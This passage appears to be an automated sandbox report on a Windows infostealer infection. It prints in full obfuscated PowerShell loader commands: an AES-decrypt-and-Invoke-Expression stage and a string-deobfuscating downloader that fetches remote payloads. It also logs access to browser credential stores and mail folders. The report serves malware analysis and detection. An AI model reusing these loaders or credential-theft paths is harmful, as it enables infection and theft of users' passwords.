[system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni98685860701936162316809131591218cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cni/cgjmqvj5jcchnuuqniccrhpmr5qmkjqyaxljaoozs+i6ujjzbuhkkmuiawh3btvdj7nwjq1x++w/d0ybgxb8mznv8qaoqqp1s2jb+ydre2mync51z88vdp5yhlxv2jub4bad5mqkn09gj7sfrzkis0lv4bbd7swdblnny01hopdzzi88ulkrhf094frfkbdtwl6drqxh86pybppz5p2ly9nfsvgpk0kub6u6kg9mbd3uxusvgzcduc0aq5exdqvpaek1wsrhmdfswp03fzttbxi2uib73uc20hna8tklwpvgqcg5yxgt1syt4jsfjugz9qtq1ux/og7araur2spi44p27efktjtinmkpdxyhkjzs52yqntfau7vkn80wlfrjako1pusni83kg4gb5vmo0l0qfdknvuszur6nwsandn5nedu4krrcvnx137d+zbob0wbqlgldby6a+emgzytzcj9ydu9srhuvpnj5c0hkwpy4dw2nc9xkyxclhpmroagz59kk909adcva3czmi4okn0iyllc6wphikpk+n/lh8dsrmpfxxmnyxhq6fpmq3t7w6xvhmihbtnk1rozfwexeeon7dkrdc0d2irlwlym+askjswieqouxpmzyjum2hcsj8o2qq6sjssecso9ph7mc3rtlzx/yu4i0g+amxaebo7jngzczrsoxbrasre5huijlm3spvhwt7bmphfnb5uatl1poeor3paytiodvmhlq5udjkwlq55foeanjf+pmojiot+punj9pkhigch6xtde+2irxnpe7ay7vlrz0f+zzhorfur8p5phwq383qgba8dubdwqow+2/zvvgy0+vtbvpazbtmhkqsshty4fy3hgqlxkhwaneqjq8wqlkzquvdy9epztjgemds6via1ixp+weiorc5nuhoaj4ygoy2moxmyeodutv3614ruxvqvvcerqlinxxajm5yyy2gvfxvy7lqs/l3ppdj/er9yz3s9rypncll0seexfchp/0aee9ha3qtqqm07kfqm7fm/txvhazzqil8wyj4sl9vdvuovk82qkltc24fpx5mykzqf4iy2ozu7+pswznbwnr+r8ibexgpk6yuljjiqen49p7iiebll4a+j83mopubclr/3wfiodrztcs5fsi1/7gww61abzmh9wq5y/pn8qrpmjkyzsp84uihhxglfpuuclltyd6067khauf+isnyuo0yqamdlvdcnsanb1ffvg2z6opzbg7sqfu6aqguz584nttwubmlcl43xdc/g09jfmr9jk22mvt+6/1kqesuax5g4j6g6n3mjeep9cvy3lojh+/kwuqr/kbqc4jibzhwktcrnn4yi2/mmj/0v3oifvqnnecpnoqxxyyjjgkg+362vfqqj/+ronzxepvq3wcwkq/chehaw5iw==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crep
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni98685860701936162316809131591218cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cni/cgjmqvj5jcchnuuqniccrhpmr5qmkjqyaxljaoozs+i6ujjzbuhkkmuiawh3btvdj7nwjq1x++w/d0ybgxb8mznv8qaoqqp1s2jb+ydre2mync51z88vdp5yhlxv2jub4bad5mqkn09gj7sfrzkis0lv4bbd7swdblnny01hopdzzi88ulkrhf094frfkbdtwl6drqxh86pybppz5p2ly9nfsvgpk0kub6u6kg9mbd3uxusvgzcduc0aq5exdqvpaek1wsrhmdfswp03fzttbxi2uib73uc20hna8tklwpvgqcg5yxgt1syt4jsfjugz9qtq1ux/og7araur2spi44p27efktjtinmkpdxyhkjzs52yqntfau7vkn80wlfrjako1pusni83kg4gb5vmo0l0qfdknvuszur6nwsandn5nedu4krrcvnx137d+zbob0wbqlgldby6a+emgzytzcj9ydu9srhuvpnj5c0hkwpy4dw2nc9xkyxclhpmroagz59kk909adcva3czmi4okn0iyllc6wphikpk+n/lh8dsrmpfxxmnyxhq6fpmq3t7w6xvhmihbtnk1rozfwexeeon7dkrdc0d2irlwlym+askjswieqouxpmzyjum2hcsj8o2qq6sjssecso9ph7mc3rtlzx/yu4i0g+amxaebo7jngzczrsoxbrasre5huijlm3spvhwt7bmphfnb5uatl1poeor3paytiodvmhlq5udjkwlq55foeanjf+pmojiot+punj9pkhigch6xtde+2irxnpe7ay7vlrz0f+zzhorfur8p5phwq383qgba8dubdwqow+2/zvvgy0+vtbvpazbtmhkqsshty4fy3hgqlxkhwaneqjq8wqlkzquvdy9epztjgemds6via1ixp+weiorc5nuhoaj4ygoy2moxmyeodutv3614ruxvqvvcerqlinxxajm5yyy2gvfxvy7lqs/l3ppdj/er9yz3s9rypncll0seexfchp/0aee9ha3qtqqm07kfqm7fm/txvhazzqil8wyj4sl9vdvuovk82qkltc24fpx5mykzqf4iy2ozu7+pswznbwnr+r8ibexgpk6yuljjiqen49p7iiebll4a+j83mopubclr/3wfiodrztcs5fsi1/7gww61abzmh9wq5y/pn8qrpmjkyzsp84uihhxglfpuuclltyd6067khauf+isnyuo0yqamdlvdcnsanb1ffvg2z6opzbg7sqfu6aqguz584nttwubmlcl43xdc/g09jfmr9jk22mvt+6/1kqesuax5g4j6g6n3mjeep9cvy3lojh+/kwuqr/kbqc4jibzhwktcrnn4yi2/mmj/0v3oifvqnnecpnoqxxyyjjgkg+362vfqqj/+ronzxepvq3wcwkq/chehaw5iw==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crepJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9
            Source: sfvnspt.dat.8.drBinary or memory string: [2024/07/26 09:10:54 Program Manager]
            Source: RegAsm.exe, 00000008.00000002.881967871.00000000005B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: RegAsm.exe, 00000008.00000002.881967871.00000000005B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00434C52 cpuid 8_2_00434C52
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_00452036
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_004520C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,8_2_00452313
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_00448404
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_0045243C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,8_2_00452543
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00452610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,8_2_0040F8D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,8_2_004488ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,8_2_00451CD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_00451F50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_00451F9B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00448957 GetSystemTimeAsFileTime,8_2_00448957
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041B60D GetComputerNameExW,GetUserNameW,8_2_0041B60D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,8_2_00449190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041739B GetVersionExW,12_2_0041739B
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.powershell.exe.446d080.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.powershell.exe.446d080.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.375856894.0000000004148000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3220, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data8_2_0040BA12
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\8_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db8_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccountJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULLJump to behavior
